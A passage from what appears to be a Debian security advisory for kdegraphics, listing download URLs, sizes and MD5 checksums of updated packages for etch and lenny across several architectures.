134af4a9d045880db1a50b65f9414502 http://security.debian.org/pool/updates/main/k/kdegraphics/kiconedit_3.5.5-3etch3_mips.deb Size/MD5 checksum: 188952 d60afec10dfdf6157e63699051228a64 http://security.debian.org/pool/updates/main/k/kdegraphics/kpdf_3.5.5-3etch3_mips.deb Size/MD5 checksum: 754164 a8b24bb88ad52bac0ff4a06e40fed131 http://security.debian.org/pool/updates/main/k/kdegraphics/kuickshow_3.5.5-3etch3_mips.deb Size/MD5 checksum: 484610 ec756e2ffdf5a487c28c18fb27cbc296 http://security.debian.org/pool/updates/main/k/kdegraphics/kooka_3.5.5-3etch3_mips.deb Size/MD5 checksum: 767296 d526803bc8c09994edd1eb2a05263301 http://security.debian.org/pool/updates/main/k/kdegraphics/kcoloredit_3.5.5-3etch3_mips.deb Size/MD5 checksum: 111414 0aeab8e50e1253f5099d4b1a603110d0 http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-dev_3.5.5-3etch3_mips.deb Size/MD5 checksum: 102602 0c57ec0a1b067b1918550c173b6b21a5 http://security.debian.org/pool/updates/main/k/kdegraphics/kview_3.5.5-3etch3_mips.deb Size/MD5 checksum: 395164 83d122b792d35de525d7724056b5b39b http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan-dev_3.5.5-3etch3_mips.deb Size/MD5 checksum: 19776 3f2b0a6019e3c490e8eba7824ad0daa7 http://security.debian.org/pool/updates/main/k/kdegraphics/kruler_3.5.5-3etch3_mips.deb Size/MD5 checksum: 65262 5b48ff15fc2cfb2228813ed2522043a1 http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-kfile-plugins_3.5.5-3etch3_mips.deb Size/MD5 checksum: 258664 04ab740de032ab6a15d230060edb0d07 http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-dbg_3.5.5-3etch3_mips.deb Size/MD5 checksum: 26688298 399b3ace615307b865d2ac7b28602314 http://security.debian.org/pool/updates/main/k/kdegraphics/kfax_3.5.5-3etch3_mips.deb Size/MD5 checksum: 148536 a89b71306d1c2439a8b4f4ea09641fdd http://security.debian.org/pool/updates/main/k/kdegraphics/kmrml_3.5.5-3etch3_mips.deb Size/MD5 checksum: 211842 cd1b7934b50965cd91987642432bc7df http://security.debian.org/pool/updates/main/k/kdegraphics/kamera_3.5.5-3etch3_mips.deb Size/MD5 checksum: 85204 7a5398cf57ac5df20abd9b91e8ceb77f http://security.debian.org/pool/updates/main/k/kdegraphics/kviewshell_3.5.5-3etch3_mips.deb Size/MD5 checksum: 746558 4bffaca1db892452457b347155490cba http://security.debian.org/pool/updates/main/k/kdegraphics/kpovmodeler_3.5.5-3etch3_mips.deb Size/MD5 checksum: 2106260 242385ba891ff767369dfa0e553166e0 http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan1_3.5.5-3etch3_mips.deb Size/MD5 checksum: 128312 655cf40af6ae1d9107c64c77ba31fb34 http://security.debian.org/pool/updates/main/k/kdegraphics/kgamma_3.5.5-3etch3_mips.deb Size/MD5 checksum: 74840 e47588f9745762c725c78ec8df2f3a81 http://security.debian.org/pool/updates/main/k/kdegraphics/ksnapshot_3.5.5-3etch3_mips.deb Size/MD5 checksum: 178492 fbc899ad97cc13e1b693b17017d2e0f9 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/k/kdegraphics/kooka_3.5.5-3etch3_mipsel.deb Size/MD5 checksum: 765926 66ac1d44f36f66f5fc64aced39103018 http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan1_3.5.5-3etch3_mipsel.deb Size/MD5 checksum: 126342 2df55ff9ded124c6c4bdd8563caca849 http://security.debian.org/pool/updates/main/k/kdegraphics/kruler_3.5.5-3etch3_mipsel.deb Size/MD5 checksum: 65136 adeb54549cbf126af571280665ce91b6 http://security.debian.org/pool/updates/main/k/kdegraphics/kiconedit_3.5.5-3etch3_mipsel.deb Size/MD5 checksum: 188586 2184d4314971c76ca2036b5d08a7dcf0 http://security.debian.org/pool/updates/main/k/kdegraphics/kdvi_3.5.5-3etch3_mipsel.deb Size/MD5 checksum: 517384 a564f7c7950337b46a5a3a3e149fdad2 http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-dev_3.5.5-3etch3_mipsel.deb Size/MD5 checksum: 100260 2051cc2952825a122c8a715e86dfd6d2 http://security.debian.org/pool/updates/main/k/kdegraphics/kpovmodeler_3.5.5-3etch3_mipsel.deb Size/MD5 checksum: 2091724 ec2d2ef066fd31399b2e68fa0a50e7c3 http://security.debian.org/pool/updates/main/k/kdegraphics/kview_3.5.5-3etch3_mipsel.deb Size/MD5 checksum: 392068 5a46b0ec571b097850d737294dceade9 http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-dbg_3.5.5-3etch3_mipsel.deb Size/MD5 checksum: 25821848 62f1b3c168ca0900cbc1e5fe91cb677e http://security.debian.org/pool/updates/main/k/kdegraphics/kfax_3.5.5-3etch3_mipsel.deb Size/MD5 checksum: 148710 c47307bd43cce7a5c1916320cb5ba4cd http://security.debian.org/pool/updates/main/k/kdegraphics/kamera_3.5.5-3etch3_mipsel.deb Size/MD5 checksum: 86010 456bc6b22580b6648ce45245d22ceed2 http://security.debian.org/pool/updates/main/k/kdegraphics/kcoloredit_3.5.5-3etch3_mipsel.deb Size/MD5 checksum: 111438 eaad2c8bf2fb34160ea6cc15468ad8e3 http://security.debian.org/pool/updates/main/k/kdegraphics/ksnapshot_3.5.5-3etch3_mipsel.deb Size/MD5 checksum: 177088 99467b0da643b13132fe39ce7f2e5a67 http://security.debian.org/pool/updates/main/k/kdegraphics/kpdf_3.5.5-3etch3_mipsel.deb Size/MD5 checksum: 740870 ea9e815617e440490f79ba1bd9ace8ed http://security.debian.org/pool/updates/main/k/kdegraphics/kuickshow_3.5.5-3etch3_mipsel.deb Size/MD5 checksum: 483584 225a1ee8ee0d0afd0790c09e2294602d http://security.debian.org/pool/updates/main/k/kdegraphics/kmrml_3.5.5-3etch3_mipsel.deb Size/MD5 checksum: 212046 978663fa001e40d159ac1003ca78f053 http://security.debian.org/pool/updates/main/k/kdegraphics/ksvg_3.5.5-3etch3_mipsel.deb Size/MD5 checksum: 1106774 19a1d2cda4d5fcd5eb558a7ee1028c6b http://security.debian.org/pool/updates/main/k/kdegraphics/kfaxview_3.5.5-3etch3_mipsel.deb Size/MD5 checksum: 107066 44bcfffcfaa4823cf7d590c016122460 http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_3.5.5-3etch3_mipsel.deb Size/MD5 checksum: 223106 4be634e792cfae60f42063d4e00d07ec http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-kfile-plugins_3.5.5-3etch3_mipsel.deb Size/MD5 checksum: 262140 c88c8c912d26c5a90c140801471ae7e5 http://security.debian.org/pool/updates/main/k/kdegraphics/kgamma_3.5.5-3etch3_mipsel.deb Size/MD5 checksum: 74882 b6825dd8a5ad1bf35123b1d0270f3e6f http://security.debian.org/pool/updates/main/k/kdegraphics/kviewshell_3.5.5-3etch3_mipsel.deb Size/MD5 checksum: 743422 05848461c45b05bbf753d01b144903c8 http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan-dev_3.5.5-3etch3_mipsel.deb Size/MD5 checksum: 19782 a87762a1c50fe7e358fa22036f72e1a2 http://security.debian.org/pool/updates/main/k/kdegraphics/kolourpaint_3.5.5-3etch3_mipsel.deb Size/MD5 checksum: 1124846 f1984135dc5a75073ed9e840d6b86cb3 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/k/kdegraphics/kruler_3.5.5-3etch3_powerpc.deb Size/MD5 checksum: 66434 5d7e6b9b3895069df8fbd4a768c2d4a7 http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan-dev_3.5.5-3etch3_powerpc.deb Size/MD5 checksum: 19786 a9c97bde6ab30865ebeb593c8acec132 http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-dbg_3.5.5-3etch3_powerpc.deb Size/MD5 checksum: 26599596 027c80f613185fa622c93e95250c697c http://security.debian.org/pool/updates/main/k/kdegraphics/kviewshell_3.5.5-3etch3_powerpc.deb Size/MD5 checksum: 786912 b5e0b40caa836f2a74a64e6266e8c49c http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan1_3.5.5-3etch3_powerpc.deb Size/MD5 checksum: 134132 162ffae039b9e5283ee21445c472351b http://security.debian.org/pool/updates/main/k/kdegraphics/kamera_3.5.5-3etch3_powerpc.deb Size/MD5 checksum: 90144 30d8dcc2e081b974234e6aa433e610ec http://security.debian.org/pool/updates/main/k/kdegraphics/kiconedit_3.5.5-3etch3_powerpc.deb Size/MD5 checksum: 174226 48af80e053d76475082ff1cbec398208 http://security.debian.org/pool/updates/main/k/kdegraphics/kpdf_3.5.5-3etch3_powerpc.deb Size/MD5 checksum: 765332 079f6eef570f24e529c9b69fb91bace9 http://security.debian.org/pool/updates/main/k/kdegraphics/kpovmodeler_3.5.5-3etch3_powerpc.deb Size/MD5 checksum: 2202446 4d47bdad70794e3c882fc4296d2ba18d http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-dev_3.5.5-3etch3_powerpc.deb Size/MD5 checksum: 100256 c8093177108326e854f146d34ebf8e0d http://security.debian.org/pool/updates/main/k/kdegraphics/kolourpaint_3.5.5-3etch3_powerpc.deb Size/MD5 checksum: 1061814 30592a399b78d85cf5fc2ace2d2c8d5c http://security.debian.org/pool/updates/main/k/kdegraphics/ksnapshot_3.5.5-3etch3_powerpc.deb Size/MD5 checksum: 172598 94c7f49aeb4fb4e0214c124e7eef7e74 http://security.debian.org/pool/updates/main/k/kdegraphics/kdvi_3.5.5-3etch3_powerpc.deb Size/MD5 checksum: 530444 03365cfc737ac8ae07067929fe330f7d http://security.debian.org/pool/updates/main/k/kdegraphics/kuickshow_3.5.5-3etch3_powerpc.deb Size/MD5 checksum: 492880 87d3097a7517f81f969bf115d166446e http://security.debian.org/pool/updates/main/k/kdegraphics/kooka_3.5.5-3etch3_powerpc.deb Size/MD5 checksum: 755036 1d068a06a2f60664beaab450d89651ec http://security.debian.org/pool/updates/main/k/kdegraphics/kfaxview_3.5.5-3etch3_powerpc.deb Size/MD5 checksum: 110202 e076dfd2f42789a1dbc0ca61c6694c42 http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-kfile-plugins_3.5.5-3etch3_powerpc.deb Size/MD5 checksum: 302834 6766f873a95247728ca9a323fb9ea405 http://security.debian.org/pool/updates/main/k/kdegraphics/ksvg_3.5.5-3etch3_powerpc.deb Size/MD5 checksum: 1227622 b574aee279585aa73caa69ecfa1cedd4 http://security.debian.org/pool/updates/main/k/kdegraphics/kcoloredit_3.5.5-3etch3_powerpc.deb Size/MD5 checksum: 104590 430c7964ac2f7f4ee5a6fb4d2923b6cd http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_3.5.5-3etch3_powerpc.deb Size/MD5 checksum: 233080 f5bacfe4df0d05bb9933e8f2613e4e9d http://security.debian.org/pool/updates/main/k/kdegraphics/kmrml_3.5.5-3etch3_powerpc.deb Size/MD5 checksum: 231012 cad8ae3f95fc9ae0c59bf32e9adb288e http://security.debian.org/pool/updates/main/k/kdegraphics/kview_3.5.5-3etch3_powerpc.deb Size/MD5 checksum: 421698 e67212c8312c1c0620218cde58e25753 http://security.debian.org/pool/updates/main/k/kdegraphics/kgamma_3.5.5-3etch3_powerpc.deb Size/MD5 checksum: 78888 b220d49b9d56e8f65096830edac215db http://security.debian.org/pool/updates/main/k/kdegraphics/kfax_3.5.5-3etch3_powerpc.deb Size/MD5 checksum: 146460 65fc9d9f6c8294cd0afee917b3efaa07 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/k/kdegraphics/kviewshell_3.5.5-3etch3_s390.deb Size/MD5 checksum: 859602 162c7179b64c33ed4480d2ceb56123c9 http://security.debian.org/pool/updates/main/k/kdegraphics/kamera_3.5.5-3etch3_s390.deb Size/MD5 checksum: 96570 b209dec1a05647b0ed570b0685adbe85 http://security.debian.org/pool/updates/main/k/kdegraphics/kmrml_3.5.5-3etch3_s390.deb Size/MD5 checksum: 246814 b955e5bd82b6531f747a733443bc695d http://security.debian.org/pool/updates/main/k/kdegraphics/kcoloredit_3.5.5-3etch3_s390.deb Size/MD5 checksum: 107550 914eb556b3bee056ad327b15faf75612 http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan-dev_3.5.5-3etch3_s390.deb Size/MD5 checksum: 19772 77aa27185dbf6f757408a5271c0c623d http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-dbg_3.5.5-3etch3_s390.deb Size/MD5 checksum: 26250586 6076a92e94d95c1d8fa8bb002cbc7071 http://security.debian.org/pool/updates/main/k/kdegraphics/kpdf_3.5.5-3etch3_s390.deb Size/MD5 checksum: 801650 6658c0396e5a8d6de1c4e7d193c75820 http://security.debian.org/pool/updates/main/k/kdegraphics/kiconedit_3.5.5-3etch3_s390.deb Size/MD5 checksum: 182526 457701e03be7ce20eecfe99bda1ecf2a http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-dev_3.5.5-3etch3_s390.deb Size/MD5 checksum: 100238 2acaaad4b522c4dfee1209b88dd18074 http://security.debian.org/pool/updates/main/k/kdegraphics/ksvg_3.5.5-3etch3_s390.deb Size/MD5 checksum: 1171508 cc07637979754d4dd5b255a378f88338 http://security.debian.org/pool/updates/main/k/kdegraphics/kuickshow_3.5.5-3etch3_s390.deb Size/MD5 checksum: 505052 8868f290a2d31aaa74f48e53271ade1f http://security.debian.org/pool/updates/main/k/kdegraphics/kruler_3.5.5-3etch3_s390.deb Size/MD5 checksum: 67208 584f1d5fac81eb5c526cb60e2b5125be http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-kfile-plugins_3.5.5-3etch3_s390.deb Size/MD5 checksum: 276418 05b61198aa566973e9ad986298cdad59 http://security.debian.org/pool/updates/main/k/kdegraphics/kfax_3.5.5-3etch3_s390.deb Size/MD5 checksum: 150620 83109755c2a70e8ef6c29817e0b55597 http://security.debian.org/pool/updates/main/k/kdegraphics/kpovmodeler_3.5.5-3etch3_s390.deb Size/MD5 checksum: 2250466 8b8773e5ecd69a4e10ad13042294d382 http://security.debian.org/pool/updates/main/k/kdegraphics/kfaxview_3.5.5-3etch3_s390.deb Size/MD5 checksum: 113778 d051e12246ef62c0f8809827ccaf4c95 http://security.debian.org/pool/updates/main/k/kdegraphics/kooka_3.5.5-3etch3_s390.deb Size/MD5 checksum: 766286 7a30be4271d302b78878a65532e8ce4f http://security.debian.org/pool/updates/main/k/kdegraphics/kgamma_3.5.5-3etch3_s390.deb Size/MD5 checksum: 79622 bf684b7d281c51e0d67a0430292b9dcf http://security.debian.org/pool/updates/main/k/kdegraphics/ksnapshot_3.5.5-3etch3_s390.deb Size/MD5 checksum: 176910 5f54ebc13b4a83a485c20d2a23e3ecea http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_3.5.5-3etch3_s390.deb Size/MD5 checksum: 248970 026d08cbe5c1431167bc794b425aba35 http://security.debian.org/pool/updates/main/k/kdegraphics/kview_3.5.5-3etch3_s390.deb Size/MD5 checksum: 422500 ad06b70ea11f632709ed8246166f0095 http://security.debian.org/pool/updates/main/k/kdegraphics/kolourpaint_3.5.5-3etch3_s390.deb Size/MD5 checksum: 1098754 d7825b822af7b9ca66c00810dabbe411 http://security.debian.org/pool/updates/main/k/kdegraphics/kdvi_3.5.5-3etch3_s390.deb Size/MD5 checksum: 538932 e4b9c7f2bc708be2c605592cb633c6d8 http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan1_3.5.5-3etch3_s390.deb Size/MD5 checksum: 145720 44f93bfb197287ec7198abe597b8110d sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/k/kdegraphics/kview_3.5.5-3etch3_sparc.deb Size/MD5 checksum: 383580 3aec5293af185ce63568093ba0ecdbba http://security.debian.org/pool/updates/main/k/kdegraphics/ksvg_3.5.5-3etch3_sparc.deb Size/MD5 checksum: 1296694 1abb2d0b4fc69f61ebc9190db630ba50 http://security.debian.org/pool/updates/main/k/kdegraphics/kpdf_3.5.5-3etch3_sparc.deb Size/MD5 checksum: 744888 225c0c9143770806b1f82de218b1acb3 http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_3.5.5-3etch3_sparc.deb Size/MD5 checksum: 230828 09999550bed069c70073b7d14d4757b8 http://security.debian.org/pool/updates/main/k/kdegraphics/kmrml_3.5.5-3etch3_sparc.deb Size/MD5 checksum: 221344 5e174102b75e4d338b33d7352e03c99d http://security.debian.org/pool/updates/main/k/kdegraphics/kiconedit_3.5.5-3etch3_sparc.deb Size/MD5 checksum: 171278 192db1c34ab0e6c7610c8775b9c3381c http://security.debian.org/pool/updates/main/k/kdegraphics/kfaxview_3.5.5-3etch3_sparc.deb Size/MD5 checksum: 106054 3d842568d12a723a553746befc70edce http://security.debian.org/pool/updates/main/k/kdegraphics/kfax_3.5.5-3etch3_sparc.deb Size/MD5 checksum: 145126 85b00b723dc0c92eb2ded3f2ece3042e http://security.debian.org/pool/updates/main/k/kdegraphics/kuickshow_3.5.5-3etch3_sparc.deb Size/MD5 checksum: 490852 ab051db510616bcb892bcedda94f70f7 http://security.debian.org/pool/updates/main/k/kdegraphics/kruler_3.5.5-3etch3_sparc.deb Size/MD5 checksum: 65438 c1dc639e2599e02c4cb5f42d6edc59b5 http://security.debian.org/pool/updates/main/k/kdegraphics/kamera_3.5.5-3etch3_sparc.deb Size/MD5 checksum: 86980 6755b05a8d58e22bba56da8a3e46bb46 http://security.debian.org/pool/updates/main/k/kdegraphics/kolourpaint_3.5.5-3etch3_sparc.deb Size/MD5 checksum: 1048614 3910bb000a345f210be4d4d951d6e9b5 http://security.debian.org/pool/updates/main/k/kdegraphics/kdvi_3.5.5-3etch3_sparc.deb Size/MD5 checksum: 533764 782f0dbe17452fdc10fba93bd1dd8e8f http://security.debian.org/pool/updates/main/k/kdegraphics/kpovmodeler_3.5.5-3etch3_sparc.deb Size/MD5 checksum: 2248190 1116c0e7763ef5390751d9176316044c http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-dev_3.5.5-3etch3_sparc.deb Size/MD5 checksum: 100258 b3c912581052c899686bd480d5abfa14 http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-dbg_3.5.5-3etch3_sparc.deb Size/MD5 checksum: 25245436 0bb867fe36dcccd3b230db6b15980172 http://security.debian.org/pool/updates/main/k/kdegraphics/ksnapshot_3.5.5-3etch3_sparc.deb Size/MD5 checksum: 171400 83d446e4e9fb59ba9da3fc8e37729ae7 http://security.debian.org/pool/updates/main/k/kdegraphics/kgamma_3.5.5-3etch3_sparc.deb Size/MD5 checksum: 77462 f8c0bc452b55b77e9cc5cf43b04470c2 http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan-dev_3.5.5-3etch3_sparc.deb Size/MD5 checksum: 19784 fd3cff889068ab768a8e6851377de7b7 http://security.debian.org/pool/updates/main/k/kdegraphics/kooka_3.5.5-3etch3_sparc.deb Size/MD5 checksum: 753538 86fb1612d658529d367e74f9b370a53a http://security.debian.org/pool/updates/main/k/kdegraphics/kviewshell_3.5.5-3etch3_sparc.deb Size/MD5 checksum: 782990 e61a5358cd8f24f7dbbbb6f5ac66ce04 http://security.debian.org/pool/updates/main/k/kdegraphics/kcoloredit_3.5.5-3etch3_sparc.deb Size/MD5 checksum: 100440 0e1cb47681f1401845f58cf8006a7310 http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan1_3.5.5-3etch3_sparc.deb Size/MD5 checksum: 131564 14f98cbc41ad2857422cb3c1cabe391c http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-kfile-plugins_3.5.5-3etch3_sparc.deb Size/MD5 checksum: 258514 1239f959b9c4db19eee511c7e2497ef6 Debian GNU/Linux 5.0 alias lenny - -------------------------------- Debian (stable) - --------------- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics_3.5.9-3+lenny1.dsc Size/MD5 checksum: 2091 ada949f67070c17e401e4069e31b44c3 http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics_3.5.9-3+lenny1.diff.gz Size/MD5 checksum: 328042 62c2c36a87f6a011ed95a6e0083d8b6e http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics_3.5.9.orig.tar.gz Size/MD5 checksum: 9058343 d66472f22db2dc5b706ed4f52d9b16f5 Architecture independent packages: http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics_3.5.9-3+lenny1_all.deb Size/MD5 checksum: 13668 37dd4bb1589c1575023096bbd084cb83 http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-doc-html_3.5.9-3+lenny1_all.deb Size/MD5 checksum: 150940 184b6fbb24202904bbf133dfd5880dae alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/k/kdegraphics/kview_3.5.9-3+lenny1_alpha.deb Size/MD5 checksum: 442440 23e94dae017d3764c0bf93fca72e82c9 http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-dbg_3.5.9-3+lenny1_alpha.deb Size/MD5 checksum: 34271278 1df447459e0d937df008ddb38238c19a http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-dev_3.5.9-3+lenny1_alpha.deb Size/MD5 checksum: 97004 eb230ee19599ce456b08f0f690e6eec0 http://security.debian.org/pool/updates/main/k/kdegraphics/kviewshell_3.5.9-3+lenny1_alpha.deb Size/MD5 checksum: 902240 f03678d83d0bb84507b4d19931a4cee0 http://security.debian.org/pool/updates/main/k/kdegraphics/kruler_3.5.9-3+lenny1_alpha.deb Size/MD5 checksum: 62312 5951b2a2ae85123ac8fbaae36f83296d http://security.debian.org/pool/updates/main/k/kdegraphics/kooka_3.5.9-3+lenny1_alpha.deb Size/MD5 checksum: 772520 9955c1ca6950e6946f624f0f0100f56e http://security.debian.org/pool/updates/main/k/kdegraphics/kuickshow_3.5.9-3+lenny1_alpha.deb Size/MD5 checksum: 507224 9535798d64ca04cb92650c866475ca11 http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-kfile-plugins_3.5.9-3+lenny1_alpha.deb Size/MD5 checksum: 325884 b638b44dec11e5f6100b20c7088aa23e http://security.debian.org/pool/updates/main/k/kdegraphics/kolourpaint_3.5.9-3+lenny1_alpha.deb Size/MD5 checksum: 1137860 36f1bf84aa9e72bbf2f64e5e5593e3e7 http://security.debian.org/pool/updates/main/k/kdegraphics/kpovmodeler_3.5.9-3+lenny1_alpha.deb Size/MD5 checksum: 2415800 3738bd20e7f5ee1159d486d2a1cc1449 http://security.debian.org/pool/updates/main/k/kdegraphics/ksnapshot_3.5.9-3+lenny1_alpha.deb Size/MD5 checksum: 173662 f5a0f6b40ebc32514b00d97c2b2ab706 http://security.debian.org/pool/updates/main/k/kdegraphics/kfaxview_3.5.9-3+lenny1_alpha.deb Size/MD5 checksum: 108646 792d1c04b977a23384b26dda7f443689 http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_3.5.9-3+lenny1_alpha.deb Size/MD5 checksum: 251922 02ee3f3fd45701241dac17bef1bd939c http://security.debian.org/pool/updates/main/k/kdegraphics/kdvi_3.5.9-3+lenny1_alpha.deb Size/MD5 checksum: 546038 3a01a6b4cbd04342f518b214ab2cb562 http://security.debian.org/pool/updates/main/k/kdegraphics/ksvg_3.5.9-3+lenny1_alpha.deb Size/MD5 checksum: 1423914 7a67f9f923be83bf18be43d856cc0a32 http://security.debian.org/pool/updates/main/k/kdegraphics/kcoloredit_3.5.9-3+lenny1_alpha.deb Size/MD5 checksum: 113182 1e868d40f4504086f67958a92c8a0db1 http://security.debian.org/pool/updates/main/k/kdegraphics/kamera_3.5.9-3+lenny1_alpha.deb Size/MD5 checksum: 93610 27c1fa3ba86ea4a81b5a128aa33a60c7 http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan-dev_3.5.9-3+lenny1_alpha.deb Size/MD5 checksum: 13494 04226fff334a9e1b6381a9c996c5a537 http://security.debian.org/pool/updates/main/k/kdegraphics/kmrml_3.5.9-3+lenny1_alpha.deb Size/MD5 checksum: 251638 a03ec2971838a966b7da491f9bfdcad2 http://security.debian.org/pool/updates/main/k/kdegraphics/kpdf_3.5.9-3+lenny1_alpha.deb Size/MD5 checksum: 950210 94bbc7d26039b9b1db22f5f8ec061676 http://security.debian.org/pool/updates/main/k/kdegraphics/kgamma_3.5.9-3+lenny1_alpha.deb Size/MD5 checksum: 77394 6d8660712f339f6c95b5c06ea66b2192 http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan1_3.5.9-3+lenny1_alpha.deb Size/MD5 checksum: 152360 cb76fefb8a85723b9455c5e3eb36f691 http://security.debian.org/pool/updates/main/k/kdegraphics/kfax_3.5.9-3+lenny1_alpha.deb Size/MD5 checksum: 146284 59518001e9e3e6785562f29c84163ee1 http://security.debian.org/pool/updates/main/k/kdegraphics/kiconedit_3.5.9-3+lenny1_alpha.deb Size/MD5 checksum: 191566 1f006cea28fb9b12198e19dd2d44d689 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/k/kdegraphics/ksvg_3.5.9-3+lenny1_amd64.deb Size/MD5 checksum: 1259102 4cfb0f1b2eaf2dba2e9c3e6a640fcb3a http://security.debian.org/pool/updates/main/k/kdegraphics/kiconedit_3.5.9-3+lenny1_amd64.deb Size/MD5 checksum: 183128 094fa14ad31bd95267e3a928d991a1f3 http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-dev_3.5.9-3+lenny1_amd64.deb Size/MD5 checksum: 97108 994f9f367a563d15bdd799a6a386e1bf http://security.debian.org/pool/updates/main/k/kdegraphics/kmrml_3.5.9-3+lenny1_amd64.deb Size/MD5 checksum: 241680 6a1220eb96a4e7640050d29a294fc46c http://security.debian.org/pool/updates/main/k/kdegraphics/kooka_3.5.9-3+lenny1_amd64.deb Size/MD5 checksum: 775400 bf0034e90256362258717e6b703a7c06 http://security.debian.org/pool/updates/main/k/kdegraphics/kfaxview_3.5.9-3+lenny1_amd64.deb Size/MD5 checksum: 111294 ce334340b229f3cb66d5d7bdffa1fca6 http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_3.5.9-3+lenny1_amd64.deb Size/MD5 checksum: 247618 6119ac5bc223c81f06fba8c2e36f1c9f http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan-dev_3.5.9-3+lenny1_amd64.deb Size/MD5 checksum: 13496 2ea8f9c5e57ad1f733f7d8b9c6c435c9 http://security.debian.org/pool/updates/main/k/kdegraphics/kuickshow_3.5.9-3+lenny1_amd64.deb Size/MD5 checksum: 498278 f9a2e73f68133adc851e486664b4ab30 http://security.debian.org/pool/updates/main/k/kdegraphics/kview_3.5.9-3+lenny1_amd64.deb Size/MD5 checksum: 428276 fd6a4cf0f983ad0cee84443f0825007b http://security.debian.org/pool/updates/main/k/kdegraphics/kviewshell_3.5.9-3+lenny1_amd64.deb Size/MD5 checksum: 865506 a41a1dfd291f0ff30a465aa13db97280 http://security.debian.org/pool/updates/main/k/kdegraphics/kruler_3.5.9-3+lenny1_amd64.deb Size/MD5 checksum: 64964 08e58ec64b3cd2008b586ef199ec6de7 http://security.debian.org/pool/updates/main/k/kdegraphics/ksnapshot_3.5.9-3+lenny1_amd64.deb Size/MD5 checksum: 172310 ac98973651c4b21edfb1871c4f4a00f3 http://security.debian.org/pool/updates/main/k/kdegraphics/kpdf_3.5.9-3+lenny1_amd64.deb Size/MD5 checksum: 899882 d3f89ab3f243e18a9eae140973e62da2 http://security.debian.org/pool/updates/main/k/kdegraphics/kfax_3.5.9-3+lenny1_amd64.deb Size/MD5 checksum: 144930 cf79dcd65d6348b95135e87a14112231 http://security.debian.org/pool/updates/main/k/kdegraphics/kolourpaint_3.5.9-3+lenny1_amd64.deb Size/MD5 checksum: 1108136 0866fa5aa82bda7db5a8e5d06fbe45bb http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-dbg_3.5.9-3+lenny1_amd64.deb Size/MD5 checksum: 25780436 25d5f9b45eab024572b513ebfcab1be4 http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-kfile-plugins_3.5.9-3+lenny1_amd64.deb Size/MD5 checksum: 287518 5c5e1eb46b216c6024ad7e30cfe50f25 http://security.debian.org/pool/updates/main/k/kdegraphics/libkscan1_3.5.9-3+lenny1_amd64.deb Size/MD5 checksum: 144434 f6e80b8ef8183fe832d0a086f7302f8d http://security.debian.org/pool/updates/main/k/kdegraphics/kamera_3.5.9-3+lenny1_amd64.deb Size/MD5 checksum: 91372 53247974541b625d0bab5cbd70c26c76 http://security.debian.org/pool/updates/main/k/kdegraphics/kgamma_3.5.9-3+lenny1_amd64.deb Size/MD5 checksum: 76498 bb76e2a1166128926db84ec16b004192 http://security.debian.org/pool/updates/main/k/kdegraphics/kcoloredit_3.5.9-3+lenny1_amd64.deb Size/MD5 checksum: 106418 083becf2d57374e2518a52b95944cea3 http://security.debian.org/pool/updates/main/k/kdegraphics/kpovmodeler_3.5.9-3+lenny1_amd64.deb Size/MD5 checksum: 2352368 ecb0bd500e99705b68db4a932be13692 http://security.debian.org/pool/updates/main/k/kdegraphics/kdvi_3.5.9-3+lenny1_amd64.deb Size/MD5 checksum: 548418 d6df60b59871de20041b0153be6ad1da arm architecture (ARM) http://security.debian.org/pool/updates/main/k/kdegraphics/kfax_3.5.9-3+lenny1_arm.deb Size/MD5 checksum: 137458 8947d28932b7e4b5ab7cd89b6f81af08 http://security.debian.org/pool/updates/main/k/kdegraphics/kfaxview_3.5.9-3+lenny1_arm.deb Size/MD5 checksum: 101784 